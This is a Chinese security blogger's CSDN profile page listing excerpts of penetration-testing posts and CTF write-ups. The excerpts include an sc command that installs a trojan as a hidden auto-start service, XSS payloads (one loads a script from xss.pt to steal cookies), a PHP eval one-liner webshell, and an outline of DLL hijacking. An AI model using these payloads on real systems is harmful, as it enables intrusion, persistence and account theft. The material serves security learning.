巡安似海
码龄3年
关注
提问 私信
  • 博客:33,853
    33,853
    总访问量
  • 27
    原创
  • 356,759
    排名
  • 25
    粉丝
  • 0
    铁粉

个人简介:接触网络安全行业6年,欢迎界内好友一起学习交流。

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:澳大利亚
  • 加入CSDN时间: 2022-05-05
博客简介:

XunanSec的博客

博客描述:
巡安似海 — 关注web安全,热爱网络安全技术,热衷于渗透测试的个人技术博客,为大家分享最前沿的技术资源
查看详细资料
个人成就
  • 获得24次点赞
  • 内容获得5次评论
  • 获得179次收藏
  • 代码片获得241次分享
创作历程
  • 28篇
    2022年
成就勋章
TA的专栏
  • 红蓝对抗
    9篇
  • 技术文章
    8篇
  • C++
    1篇
  • PyHacker编写指南
    10篇
  • 漏洞预警
  • 内网渗透
  • 免杀技术
兴趣领域 设置
  • 网络空间安全
    web安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

记一次绕过安全狗与360艰难提权

端午短暂休息三天,复工之后朋友又丢给我一个,在打台球途中了解了一下这个奇怪的,说是无法执行命令,经过测试发现只能执行命令,确实奇怪,草草打了几局台球就回去拿起电脑开日菜刀上面写着当前用户为,但是执行任何命令都没有回显,要不是这个可以上传下载浏览文件,我都怀疑这个是假的了难道是禁用了高危函数吗?查看发现也没禁用呀至于这种没有任何回显的,一时间有点不知所措,那么就先翻一下文件吧(这是在没有思路情况下的一种思路)顺便也可以了解目标机器的环境,是否存在杀软,是否宝塔面板搭建的等等......每一个环境都有每一种思
原创
发布博客 2022.06.07 ·
1966 阅读 ·
2 点赞 ·
1 评论 ·
1 收藏

记一些linux安全应急排查思路和命令

0x00 前言都是蓝队一些很常用的应急排查命令0x01 防守排查基本流程1. 查看日志以及防守设备的日志,看看攻击情况(/在探测(是否有风险)/已经入侵成功) 探测中有风险就直接2. 进来的话看日志判断动了哪些资源 判断目的 提交报告 隔离服务环境 看判断漏洞位置 清理shell 及时修复 及时提交报告3. 根据攻击者ip 做一些溯源 比如威胁感知平台查查有些攻击者如果使用自己的vps ,看看上面是否有服务 有就可以进行找4. 搞进来了可以不立马杀死 投放诱饵文件 尝试反杀攻击者 根据攻击者特征(浏览
转载
发布博客 2022.06.02 ·
394 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

SC实现隐藏Windows服务维持权限

简介:sc.exe是Windows系统文件中自带的服务管理程序,可远程对服务进行操作;这里讲述了利用sc和Powershell程序来隐藏服务,搭到长期维持权限的效果。创建服务创建一个服务名为demo的自启动服务,服务运行地址指向木马路径,以tcpip协议传输并以本地系统权限运行sc create demo start= auto binPath="cmd.exe /k C:\tu.exe" depend= Tcpip obj= Localsystem添加个描述sc descr
原创
发布博客 2022.05.31 ·
1018 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

记一次初学PHP反序列化

0x00 直接进入状态刚开始学习反序列化,此贴为记录初学的入门级反序列化的CTF题此题为Bugku的一道Web题,考点是反序列化和PHP的基本知识该题的标题为:点login咋没反应进入靶场之后,可以看到Login按钮是一个摆设,并没有提交功能右键查看源代码,只能看到一个css文件,点开看一下第一行就是一个注释,提示我们在Url后面添加?19737添加?19737之后,显示了源码这里我们只看PHP代码<?php error_reporting(0); ...
原创
发布博客 2022.05.29 ·
483 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

C++从虚表地址中取内容

开局一张图从地址中,调用虚表中的函数,上图!1、定义父类指针地址,申请子类内存空间cParent *cp = new cSon;2、获取虚表的首地址cp 指针变量int* 强转为int类型* 再取*,表示取虚表的首地址为什么​​*​​是取虚表呢,因为cp指针变量本身就是父类地址申请的子类空间,就是虚析构*(int*)cp3、虚表首地址取到了,接下来该取虚表中的第一个元素首地址将虚表首地址强转为int类型,加0...
原创
发布博客 2022.05.28 ·
402 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

实战挖掘某出版社漏洞集合

0x00 前言之前挖漏洞时,碰到的一个出版社漏洞,也是挺有名的,看码猜社哈哈。0x01 主站XSS主页搜索框,发现是get传参http://www.*****.com/so.htm?&KEY=1%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E个人中心XSS可打Cookie基本资料,昵称处限制了长度,直接插入payload<sCRiPt sRC=http://xss.pt/xxxx>&l
原创
发布博客 2022.05.27 ·
874 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

网鼎杯-青龙组-Web-Wp

0x01 开局一张图一看就知道让我们代码审计对于这种一长串的源码,还是逐步来解把首先的解题思路就是查看CTF题目的命名和代码函数CTF题目这里命名为AreUSerialz,我反正一眼看不出什么端详,打的CTF比较少,直接看函数名字在下面可以看到有一个unserialize()函数,那这一题基本上就是考反序列化的知识了。我们整体的浏览一边代码,来看一下程序的大概走向。<?phpinclude("flag.php");highlight_file(__FILE__);cl
原创
发布博客 2022.05.26 ·
1554 阅读 ·
2 点赞 ·
0 评论 ·
5 收藏

Burp半自动时间盲注

0x00 直接开始实战中碰到延时的注入点,一个一个测太麻烦,Python脚本又不会写,那我们就善用Burp。首先要构造好注入语句,接着使用Burp抓包发送到爆破模块去掉所有变量,设置两个变量第一个是数据库的名字位,第二个是数据库名字符对应的ASCII码爆破两个变量 选择Cluster bomb模式设置payload第一个Payload是数据库的名字位一共有5位,那么我们设置1~5即可第二个Payload是数据库名字对应的ASCII码,ASCII码最大
原创
发布博客 2022.05.25 ·
794 阅读 ·
0 点赞 ·
1 评论 ·
1 收藏

简单实现程序DLL劫持

0x00 前言程序启动会调用固定的.dll文件,通过特定的手法将木马代码和进程注入到可被劫持的DLL文件中,当程序正常启动,我们代码也会秘密执行。0x01 利用过程用到的工具1、Aheadlib2、Visual Studio用美图看看Pdf来测试,朋友们可以拿这个练手,毕竟只有一个.dll文件,小傻瓜都知道是调用的这个dll来启动程序的找到易劫持的dll文件,打开Aheadlib,引入注意这里设置的原始dll文件名,记住了最后正常dll名字要修改成这个点击生成会
原创
发布博客 2022.05.24 ·
2178 阅读 ·
0 点赞 ·
0 评论 ·
23 收藏

【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)

0x00 存储XSS1) 可绕过的XSS给大家分享个漏洞案例,今天上午刚把电脑修好某技术学院储存XSS+CSRF(XSS绕过滤到蠕虫攻击)注册处:http://xxx.edu.cn/meol/xxxx需要注册才能进入社区发表,先说下储存XSS,过滤了,发现可绕过储存XSS:http://xxx.edu.cn/meol/xxx?genre=80&type=0他是先过滤再输出,而不是输出时过滤,从而导致可绕过我们发现他输入时就进行了过滤,直接替换<script>a.
原创
发布博客 2022.05.23 ·
633 阅读 ·
3 点赞 ·
0 评论 ·
3 收藏

(总结)绕过CDN查找真实IP

网上也有很多的相关文章,这里仅说一些最实用的方法首先,我们要去判断是否存在CDN,然后再去查找真实IP0x01 判断是否存在CDN1) 利用pinghttp://ping.chinaz.com/http://ping.aizhan.com/使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN,同时要查看IP归属地2) 利用nslookupnslookup 进行检测,原理同上,如果返回域名解析对应多个 IP 地址多半是使用了 C
原创
发布博客 2022.05.22 ·
1309 阅读 ·
0 点赞 ·
0 评论 ·
20 收藏

XSS漏洞利用方式总结

前言:最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。00×1什么是XSS漏洞: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 ​00×2 XSS漏洞有什么危害:1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号...
原创
发布博客 2022.05.21 ·
4973 阅读 ·
4 点赞 ·
1 评论 ·
51 收藏

【PyHacker编写指南】经常会用到的模块

这节是巡安似海PyHacker系列的最后一节慕然回首URL采集工具,后台扫描器,端口扫描编写....00x1:需要用到的模块如下:(仅举例常用方法)import randomimporttimeimportplatformimportsys00x2:Random模块 #常用于随机数随机生成 1-10中的其中一位:random.randint(1,10)生成一个随机数:random.random()listx = ['xc','www....
原创
发布博客 2022.05.20 ·
138 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

【PyHacker编写指南】爆破一句话密码

这节课是巡安似海PyHacker编写指南的《编写漏洞POC》使用Python编写一句话密码爆破工具,解脱双手。编写环境:Python2.x00x1:需要用到的模块如下:importrequests00x2:首先我们了解一下一句话马,一般post传递参数一个简单的php一句话<?phpeval($_POST['x'])?>OK,没问题,我们用浏览器打开传参看一下由此可以看到密码为x,变量提交能匹配上即执行echo语句这时我猜大家都有.
原创
发布博客 2022.05.19 ·
245 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

【PyHacker编写指南】实战编写漏洞POC

这节课是巡安似海PyHacker编写指南的《编写漏洞POC》经过前面的几节PyHacker系列的沉淀,这节课来讲讲如何编写漏洞POC实现自动化。编写环境:Python2.x
原创
发布博客 2022.05.18 ·
1079 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

【PyHacker编写指南】网站Cms识别工具

这节课是巡安似海PyHacker编写指南的《打造网站Cms识别工具》喜欢用Python写脚本的小伙伴可以跟着一起写一写呀。编写环境:Python2.x
原创
发布博客 2022.05.17 ·
693 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

【PyHacker编写指南】XSS检测脚本编写

这节课是巡安似海PyHacker编写指南的《XSS检测脚本编写》喜欢用Python写脚本的小伙伴可以跟着一起写一写。编写环境:Python2.x
原创
发布博客 2022.05.16 ·
1102 阅读 ·
1 点赞 ·
0 评论 ·
11 收藏

【PyHacker编写指南】Sql注入脚本编写

这节课是巡安似海PyHacker编写指南的《Sql注入脚本编写》有些注入点sqlmap跑不出,例如延时注入,实际延时与语句延时时间不符,sqlmap就跑不出,这就需要我们自己根据实际情况编写脚本来注入了。文末,涉及了sqlmap tamper编写,所以需要一定的python基础才能看懂。喜欢用Python写脚本的小伙伴可以跟着一起写一写。
原创
发布博客 2022.05.15 ·
2351 阅读 ·
0 点赞 ·
0 评论 ·
23 收藏

【PyHacker编写指南】Nmap模块实现端口扫描

这节课是巡安似海PyHacker编写指南的《端口扫描器编写》引用Nmap库实现扫描功能,本节课比较简单一看就会。编写环境:Python2.x
原创
发布博客 2022.05.14 ·
258 阅读 ·
0 点赞 ·
1 评论 ·
0 收藏

【Pyhacker编写指南】端口扫描器

这节课是巡安似海PyHacker编写指南的《端口扫描器编写》主要是以Nmap举例编写,其中涉及的协议暂不过多讨论,喜欢用Python写脚本的小伙伴可以跟着一起写一写呀。编写环境:Python2.x
原创
发布博客 2022.05.13 ·
415 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏
加载更多